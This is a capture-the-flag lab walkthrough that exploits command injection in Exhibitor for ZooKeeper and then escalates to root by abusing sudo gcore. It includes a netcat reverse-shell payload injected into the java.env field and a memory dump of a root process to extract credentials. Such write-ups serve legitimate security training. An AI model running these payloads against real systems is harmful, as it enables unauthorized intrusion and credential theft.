About This Lab: To exploit this lab, you’ll achieve an initial foothold through an unauthenticated command injection vulnerability. Following that, you’ll gain root access by leveraging sudo to disclose a password. This lab enhances your skills in identifying and exploiting command injection vulnerabilities and understanding privilege escalation techniques.
Recon
Start enumeration with rustscan and automatically pass the open ports to nmap to run script, version, and OS scans against them.
rustscan -a 192.168.116.98 --ulimit 5000 -- -A
SMB is open 139/445, we can check if there are any shares we have anonymous access to with smbmap.
smbmap -H 192.168.116.98
No luck.
In our nmap scan we have a http port 8081 that mentions a redirect to http://192.168.116.98:8080/exhibitor/v1/ui/index.html. If we follow that URL we land on this page.
Doing a quick google search for Exhibitor for Zookeeper just to see what it is, we are prompted with a RCE vulnerability. That is good to see.
The application is on version so we should get command injection as long as it is surrounded by a ' or a $ symbol. the command must be entered in the java.env script filed. We could get a revshell with a simple nc one liner.
$(/bin/nc -e /bin/sh 192.168.45.249 4444 &)
We set up a revshell and wait.
nc -nvlp 4444
We’re in as user Charles!
We need to improve our tty before proceeding.
python3 -c 'import pty;pty.spawn("/bin/bash")'First thing I like to do with inital access is checking for sudo privileges.
sudo -l
We can run /usr/bin/gcore with no password. We can check GTFObins to see if there are any sudo privilege abuse on gcore.
If we are able to do privileged reads on files by specifiying the process ID, we first need to list all the running processes. Any processes running a file as root or another user would be what we want to target.
ps auxww
# The extra ww means “don’t truncate the output” — it tells ps to show the entire command line for each process, regardless of length.
ww stands for “wide wide,” an old UNIX convention (each w widens the output).
The file
/usr/bin/password-storelooks interesting.
We can use gcore on this file. It is running on PID 494. Then, we can output the data using strings.
sudo /usr/bin/gcore 494
strings core.494
We have some creds!
We can try to use these creds to ssh into the box, or we can switch user.
su - root
Root flag can be found in the pwd.
Pwn3d!